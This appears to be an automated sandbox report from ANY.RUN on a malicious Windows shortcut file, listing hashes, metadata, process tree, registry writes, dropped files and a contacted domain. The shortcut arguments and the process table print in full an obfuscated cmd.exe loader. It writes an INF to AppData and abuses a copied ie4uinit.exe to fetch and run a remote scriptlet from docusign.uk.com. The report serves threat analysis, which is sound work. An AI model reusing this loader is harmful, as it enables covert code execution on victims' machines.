File name: | 45593a7071903724aae4974d478a17784cfca63af4d3404312fb4b5ecb9e0f1c |
Full analysis: | https://app.any.run/tasks/58f92791-2735-4bb1-8c2e-74894b313bac |
Verdict: | Malicious activity |
Analysis date: | October 07, 2021, 10:29:29 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | application/octet-stream |
File info: | MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=97, Archive, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=278528, window=hide |
MD5: | D5DF5B266FC8C9AF26F6593F8EA771A8 |
SHA1: | B786A7C78B746CDA42F49211FC2E437AF17D1CE4 |
SHA256: | 45593A7071903724AAE4974D478A17784CFCA63AF4D3404312FB4B5ECB9E0F1C |
SSDEEP: | 96:8yGcgoiDlGKUTk3KJzQcQlmtnwC1FVu/FtXN8i3wXtVaTRdSLqDyXtsHJr6uTist:8yGEoKTVe |
| .lnk | Windows Shortcut (100) |
|---|---|

MachineID: | - |
IconFileName: | imageres.dll |
CommandLineArguments: | /v /c set "GTAZMGS4299=set" && call set "GTAZMGS0851=%GTAZMGS4299:~0,1%" && (for %j in (c) do @set "GTAZMGS1665=%~j") && !GTAZMGS0851!et "GTAZMGS89944=ure=$w" && !GTAZMGS0851!et "GTAZMGS55863=a" && set "GTAZMGS39107=t" && !GTAZMGS0851!et "GTAZMGS5644=d" && set "GTAZMGS68144=." && set "GTAZMGS5707=init" && set "GTAZMGS84148=e" && set "GTAZMGS28159=settings" && set "GTAZMGS1300=!GTAZMGS68144!inf" && !GTAZMGS0851!et "GTAZMGS5629=ieu!GTAZMGS5707!!GTAZMGS1300!" && call !GTAZMGS0851!et "GTAZMGS11336=%app!GTAZMGS5644!ata%\Micro!GTAZMGS0851!oft\" && !GTAZMGS0851!et "GTAZMGS53594=!GTAZMGS11336!!GTAZMGS5629!" && !GTAZMGS0851!et "GTAZMGS2081="^" && (for %x in ("[version]" "signat!GTAZMGS89944!indow!GTAZMGS0851! ntf7f81a39-5f63-5b42-9efd-1f13b5431005quot; "[!GTAZMGS5644!e!GTAZMGS0851!tinationdirs]" "mPPvq=01" "[!GTAZMGS5644!efaultin!GTAZMGS0851!tall.windows7]" "UnRegis!GTAZMGS39107!erOCXs=wyGHzZ" "!GTAZMGS5644!elfiles=mPPvq" "[wyGHzZ]" "%11%\scRo%GTAZMGS17745%j,NI,%GTAZMGS37749%%GTAZMGS0413%%GTAZMGS0413%p%GTAZMGS25026%%GTAZMGS9855%%GTAZMGS9855%docusign!GTAZMGS68144!uk!GTAZMGS68144!%GTAZMGS29707%/history!GTAZMGS68144!txt" "[mPPvq]" "ieu%GTAZMGS2306%!GTAZMGS1300!" "[!GTAZMGS0851!!GTAZMGS39107!rings]" "GTAZMGS2306=!GTAZMGS5707!" "GTAZMGS0413=t" "!GTAZMGS0851!ervicen!GTAZMGS55863!me=' '" "GTAZMGS37749=h" "GTAZMGS25026=:" "GTAZMGS9855=/" "!GTAZMGS0851!hortsvcn!GTAZMGS55863!me=' '" "GTAZMGS29707=com" "GTAZMGS17745=b") do @e!GTAZMGS1665!ho %~x)>"!GTAZMGS53594!" && !GTAZMGS0851!et "GTAZMGS06018=ie4u!GTAZMGS5707!.!GTAZMGS84148!xe" && call copy /Y %win!GTAZMGS5644!ir%\!GTAZMGS0851!ystem32\!GTAZMGS06018! "!GTAZMGS11336!" && !GTAZMGS0851!t!GTAZMGS55863!rt "" /MIN wmi!GTAZMGS1665! proce!GTAZMGS0851!s call !GTAZMGS1665!rea!GTAZMGS39107!e "!GTAZMGS11336!!GTAZMGS06018! -base!GTAZMGS28159!" |
RelativePath: | ..\..\..\..\ |
LocalBasePath: | - |
VolumeLabel: | Windows |
DriveType: | Fixed Disk |
TargetFileDOSName: | - |
HotKey: | (none) |
RunWindow: | Normal |
IconIndex: | 97 |
TargetFileSize: | 278528 |
FileAttributes: | Archive |
Flags: | IDList, LinkInfo, RelativePath, CommandArgs, IconFile, Unicode, ExpString |
PID | CMD | Path | Indicators | Parent process
---|---|---|---|---
3388 | "C:\Windows\System32\cmd.exe" /v /c set "GTAZMGS4299=set" && call set "GTAZMGS0851=%GTAZMGS4299:~0,1%" && (for %j in (c) do @set "GTAZMGS1665=%~j") && !GTAZMGS0851!et "GTAZMGS89944=ure=$w" && !GTAZMGS0851!et "GTAZMGS55863=a" && set "GTAZMGS39107=t" && !GTAZMGS0851!et "GTAZMGS5644=d" && set "GTAZMGS68144=." && set "GTAZMGS5707=init" && set "GTAZMGS84148=e" && set "GTAZMGS28159=settings" && set "GTAZMGS1300=!GTAZMGS68144!inf" && !GTAZMGS0851!et "GTAZMGS5629=ieu!GTAZMGS5707!!GTAZMGS1300!" && call !GTAZMGS0851!et "GTAZMGS11336=%app!GTAZMGS5644!ata%\Micro!GTAZMGS0851!oft\" && !GTAZMGS0851!et "GTAZMGS53594=!GTAZMGS11336!!GTAZMGS5629!" && !GTAZMGS0851!et "GTAZMGS2081="^" && (for %x in ("[version]" "signat!GTAZMGS89944!indow!GTAZMGS0851! ntf7f81a39-5f63-5b42-9efd-1f13b5431005quot; "[!GTAZMGS5644!e!GTAZMGS0851!tinationdirs]" "mPPvq=01" "[!GTAZMGS5644!efaultin!GTAZMGS0851!tall.windows7]" "UnRegis!GTAZMGS39107!erOCXs=wyGHzZ" "!GTAZMGS5644!elfiles=mPPvq" "[wyGHzZ]" "%11%\scRo%GTAZMGS17745%j,NI,%GTAZMGS37749%%GTAZMGS0413%%GTAZMGS0413%p%GTAZMGS25026%%GTAZMGS9855%%GTAZMGS9855%docusign!GTAZMGS68144!uk!GTAZMGS68144!%GTAZMGS29707%/history!GTAZMGS68144!txt" "[mPPvq]" "ieu%GTAZMGS2306%!GTAZMGS1300!" "[!GTAZMGS0851!!GTAZMGS39107!rings]" "GTAZMGS2306=!GTAZMGS5707!" "GTAZMGS0413=t" "!GTAZMGS0851!ervicen!GTAZMGS55863!me=' '" "GTAZMGS37749=h" "GTAZMGS25026=:" "GTAZMGS9855=/" "!GTAZMGS0851!hortsvcn!GTAZMGS55863!me=' '" "GTAZMGS29707=com" "GTAZMGS17745=b") do @e!GTAZMGS1665!ho %~x)>"!GTAZMGS53594!" && !GTAZMGS0851!et "GTAZMGS06018=ie4u!GTAZMGS5707!.!GTAZMGS84148!xe" && call copy /Y %win!GTAZMGS5644!ir%\!GTAZMGS0851!ystem32\!GTAZMGS06018! "!GTAZMGS11336!" && !GTAZMGS0851!t!GTAZMGS55863!rt "" /MIN wmi!GTAZMGS1665! proce!GTAZMGS0851!s call !GTAZMGS1665!rea!GTAZMGS39107!e "!GTAZMGS11336!!GTAZMGS06018! -base!GTAZMGS28159!" | C:\Windows\System32\cmd.exe | | Explorer.EXE
 | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | | |
1876 | wmic process call create "C:\Users\admin\AppData\Roaming\Microsoft\ie4uinit.exe -basesettings" | C:\Windows\System32\Wbem\WMIC.exe | — | cmd.exe
 | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: WMI Commandline Utility; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | |
856 | C:\Users\admin\AppData\Roaming\Microsoft\ie4uinit.exe -basesettings | C:\Users\admin\AppData\Roaming\Microsoft\ie4uinit.exe | — | wmiprvse.exe
 | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: IE Per-User Initialization Utility; Exit code: 0; Version: 11.00.9600.19597 (winblue_ltsb_escrow.191216-1311) | | |
3732 | C:\Users\admin\AppData\Roaming\Microsoft\ie4uinit.exe -ClearIconCache | C:\Users\admin\AppData\Roaming\Microsoft\ie4uinit.exe | — | ie4uinit.exe
 | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: IE Per-User Initialization Utility; Exit code: 0; Version: 11.00.9600.19597 (winblue_ltsb_escrow.191216-1311) | | |
PID | Process | Operation | Key | Name | Value
---|---|---|---|---|---
856 | ie4uinit.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3 | IEPropFontName | Times New Roman
856 | ie4uinit.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3 | IEFixedFontName | Courier New
856 | ie4uinit.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\4 | IEPropFontName | Times New Roman
856 | ie4uinit.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\4 | IEFixedFontName | Courier New
856 | ie4uinit.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\5 | IEPropFontName | Times New Roman
856 | ie4uinit.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\5 | IEFixedFontName | Courier New
856 | ie4uinit.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\6 | IEPropFontName | Times New Roman
856 | ie4uinit.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\6 | IEFixedFontName | Courier New
856 | ie4uinit.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\7 | IEPropFontName | Sylfaen
856 | ie4uinit.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\7 | IEFixedFontName | Sylfaen
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
3388 | cmd.exe | C:\Users\admin\AppData\Roaming\Microsoft\ieuinit.inf | ini | 6DB1797BCD95AAF5F11FCFDD990E55CE | E42046AF91FC0852A2935925DB6E510A6B4B6C76DB46E8067FE70BD7FA4E717B
856 | ie4uinit.exe | C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\brndlog.txt | text | 3098BBDD84794F3429FE02E2D7781C48 | C25F444580905AE18DDB7C254C44A8E3FDAC5B359E347F2C130B8BF7706CDB81
856 | ie4uinit.exe | C:\Windows\Temp\OLD4410.tmp | ini | 6DB1797BCD95AAF5F11FCFDD990E55CE | E42046AF91FC0852A2935925DB6E510A6B4B6C76DB46E8067FE70BD7FA4E717B
856 | ie4uinit.exe | C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Tiles\pin9728060290\msapplication.xml | xml | E153C6D960F845B74F1A90AE11670556 | 4B906B6DB2836AAA38ED20EBD2D1F1DAE2394AFAD578EE83720A919C8D366D29
856 | ie4uinit.exe | C:\Users\admin\Favorites\Links\Web Slice Gallery.url | text | 1E7E5E93C2A5AADAF932F93D25C57F3E | 8B94D04FECE582E4182E8E73F46FB86EB8E965C69C526C42805ABB9E43641E35
3388 | cmd.exe | C:\Users\admin\AppData\Roaming\Microsoft\ie4uinit.exe | executable | ACA03178C248B32343B03F4B9ACCE1B9 | C3612DA14216A2F5872BD0D140A76D1A257E9668EFA46A5CED5419E51ED30B49
856 | ie4uinit.exe | C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\brndlog.bak | text | E9E473C9777B0C24D50EE8C972A78FE2 | 90BE32975E76E679B01FF719148DF508CBBE2D7F2C47D93201F33A31994B4174
Domain | IP | Reputation
---|---|---
docusign.uk.com | | unknown